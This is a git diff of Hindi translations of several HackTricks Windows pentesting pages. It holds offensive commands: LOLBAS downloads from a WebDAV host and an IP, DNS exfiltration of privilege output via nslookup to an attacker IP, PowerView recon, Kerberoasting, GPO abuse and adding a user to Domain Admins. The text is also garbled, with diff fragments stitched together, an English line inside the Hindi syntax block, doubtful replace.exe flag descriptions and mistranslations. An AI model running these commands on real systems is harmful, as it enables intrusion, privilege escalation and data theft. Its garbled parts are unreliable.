`Replace.exe` एक Windows सिस्टम उपयोगकर्ताओं के लिए एक उपयोगी टूल है जो फ़ाइलों और डायरेक्टरीज़ को बदलने के लिए उपयोग किया जा सकता है। यह टूल विंडोज़ कमांड लाइन में उपलब्ध है और उपयोगकर्ताओं को फ़ाइलों को एक स्थान से दूसरे स्थान पर कॉपी करने और बदलने की अनुमति देता है।
**सिंटेक्स**
```plaintext
replace <लक्ष्य> <स्र> [/A] [/P] [/R] [/W] [/U] [/S] [/Q] [/T]
Replace.exe is a Windows utility that allows you to replace or update one or more files with another file. It can be used by pentesters to quickly replace sensitive files with harmless ones during security assessments.
```
**पैरामीटर्स**
- `<लक्ष्य>`: बदलने के लक्ष्य का पूरा पथ और फ़ाइल नाम।
- `<स्रोत>`: बदलने के लिए स्रोत फ़ाइल या डायरेक्टरी का पूरा पथ और नाम।
- `/A`: बदलने के लिए सभी फ़ाइलों को बदलने की अनुमति देता है।
- `/P`: पुष्टि के लिए पूछता है जब भी एक फ़ाइल को बदला जाए।
- `/R`: उपनामों को बदलने की अनुमति देता है।
- `/W`: बदलने के लिए विंडोज़ को बोलता है कि प्रक्रिया पूर्ण हो गई है जब तक यह पूरा नहीं हो जाता।
- `/U`: बदलने के लिए अनुमति देता है, लेकिन यह अद्यतन नहीं करता है।
- `/S`: उपनामों के लिए उपनामों के अंदर भी बदलने की अनुमति देता है।
- `/Q`: शांत रूप से काम करता है, बिना किसी पुष्टि के।
- `/T`: टेम्पलेट फ़ाइल का उपयोग करता है।
```
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
```
@ -397,16 +381,16 @@ Squirrel.exe
```
squirrel.exe --download [url to package]
```
```html
<h2>Update.exe</h2>
```
```plaintext
अपडेट.exe
```
```
Update.exe --download [url to package]
```
```plaintext
Winword.exe
```
```
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```
```html
@ -473,9 +457,9 @@ help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### सुनने का पता ACLs
### सुनिए पता ACLs
आप व्यवस्थापक न होते हुए [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) पर सुन सकते हैं।
आप [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) पर ऐडमिनिस्ट्रेटर बिना सुन सकते हैं।
```bash
netsh http show urlacl
```
@ -503,7 +487,7 @@ for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"')
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```
## C संकेत से CMD को कॉल करना
## C संकेत से CMD को बुलाना
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
@ -550,10 +534,10 @@ powershell -ep bypass - < c:\temp:ttt
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पता लगाना चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं या पीईएएस को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -4,19 +4,19 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
PowerView का सबसे अद्यतन संस्करण हमेशा PowerSploit की dev शाखा में रहेगा: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
PowerView का सबसे अद्यतन संस्करण हमेशा PowerSploit के डेव शाखा में होगा: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
[**SharpView**](https://github.com/tevora-threat/SharpView) यह [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) का .NET पोर्ट है
[**SharpView**](https://github.com/tevora-threat/SharpView) एक .NET पोर्ट है [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
### त्वरित परिगणना
### त्वरित गणना
```powershell
Get-NetDomain #Basic domain info
#User info
@ -136,7 +136,7 @@ Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -
Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
```
### लॉगऑन और सेशन्स
### लॉगऑन और सत्र
```powershell
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host
@ -144,10 +144,10 @@ Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the mom
Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
```
### ग्रुप पॉलिसी ऑब्जेक्ट - GPOs
### समूह नीति वस्तु - जीपीओ
यदि हमलावर के पास **GPO पर उच्च विशेषाधिकार** हैं, तो वह इसका दुरुपयोग करके **privesc** कर सकता है, जैसे कि **एक उपयोगकर्ता को अनुमतियाँ जोड़ना**, **क स्थानीय व्यवस्थापक उपयोगकर्ता को होस्ट में जोड़ना** या **निर्धारित कार्य बनाना** (तत्काल) कोई कार्य करने के लिए।\
[**इसके बारे में अधिक जानकारी और इसका दुरुपयोग कैसे करें इस लिंक का अनुसरण करें**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
यदि किसी हमलावर के पास **जीपीओ पर उच्च विशेषाधिकार** होते हैं, तो वह इसका दुरुपयोग करके **उच्चतम अधिकार (privesc)** प्राप्त कर सकता है, **एक उपयोगकर्ता को अनुमतियाँ जोड़ना**, **िसी होस्ट में स्थानीय व्यवस्थापक उपयोगकर्ता जोड़ना** या **किसी कार्रवाई को करने के लिए तत्काल एक निर्धारित कार्य (scheduled task) बनाना**।\
[**इसके बारे में अधिक जानकारी और इसका दुरुपयोग कैसे करें, उसके लिए इस लिंक पर क्लिक करें**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
```powershell
#GPO
Get-DomainGPO | select displayName #Check the names for info
@ -181,7 +181,7 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
# Enumerates the machines where a specific domain user/group is a member of a specific local group.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
```
जानें कैसे **GPOs और ACLs पर अनुमतियों का शोषण करें**:
सीखें कैसे **GPOs और ACLs पर अनुमतियों का शोषण करें**:
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
@ -208,13 +208,13 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
#Get special rights over All administrators in domain
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
```
### साझा की गई फ़ाइलें और फ़ोल्डर्स
### साझा फ़ाइलें और फ़ोल्डर
```powershell
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters
```
### डोमेन ट्रस्ट
### डोमेन विश्वास
```powershell
Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-DomainTrust #Same
@ -231,7 +231,7 @@ Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between
Get-DomainForeingUser #Get users with privileges in other domains inside the forest
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
### निम्न-स्तरीय सुलभ लक्ष्य
### कमीनी फल
```powershell
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -285,14 +285,14 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
#### विभिन्न प्रमाणपत्र (तर्क) का उपयोग करें
#### विभिन्न प्रमाणीकरण का उपयोग (विधान)
```powershell
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
```
#### एक उपयोगकर्ता का अनुकरण करें
#### उपयोगकर्ता का अनुकरण
```powershell
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
@ -316,10 +316,10 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -2,17 +2,17 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **[💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [telegram समूह](https://t.me/peass) में शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>
बाहरी सिस्टम में कमांड्स को निष्पादित करने के लिए विभिन्न तरीके हैं, यहां आपको प्रमुख Windows लैटरल मूवमेंट तकनीकों के काम करने की व्याख्यान मिलेगा:
बाहरी सिस्टम में कमांड्स को निष्पादित करने के विभिन्न तरीके हैं, यहाँ आपको मुख्य Windows लैटरल मूवमेंट तकनीकों काम करने की व्याख्याएँ मिलेंगी:
* [**PsExec**](../ntlm/psexec-and-winexec.md)
* [**SmbExec**](../ntlm/smbexec.md)
@ -20,18 +20,18 @@
* [**AtExec / SchtasksExec**](../ntlm/atexec.md)
* [**WinRM**](../ntlm/winrm.md)
* [**DCOM Exec**](dcom-exec.md)
* ****[**कुकी पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) **** (बादल)
* ****[**PRT पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) **** (बादल)
* [**AzureAD प्रमाणपत्र पारित करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (बादल)
* ****[**कुकी पा करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-cookie) **** (cloud)
* ****[**PRT पा करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/pass-the-prt) **** (cloud)
* [**AzureAD सर्टिफिकेट पास करें**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **[💬](https://emojipedia.org/speech-balloon/) [Discord समूह](https://discord.gg/hRep4RUj7f) या [telegram समूह](https://t.me/peass) में शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>

View file

@ -5,16 +5,16 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा गड़बड़ी खोजें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
वे सुरक्षा गड़बड़ी खोजें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,7 +22,7 @@
## MMC20.Application
वितरित कॉम्पोनेंट ऑब्जेक्ट मॉडल (DCOM) ऑब्जेक्ट्स नेटवर्क-आधारित ऑब्जेक्ट्स के साथ दिलचस्प क्षमता प्रस्तुत करते हैं। माइक्रोसॉफ्ट DCOM और कॉम्पोनेंट ऑब्जेक्ट मॉडल (COM) के लिए व्यापक दस्तावेज़ीकरण प्रदान करता है, जिसका उपयोग [DCOM के लिए यहाँ](https://msdn.microsoft.com/en-us/library/cc226801.aspx) और [COM के लिए यहाँ](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx) किया जा सकता है। DCOM एप्लिकेशनों की सूची PowerShell कमांड का उपयोग करके प्राप्त की जा सकती है:
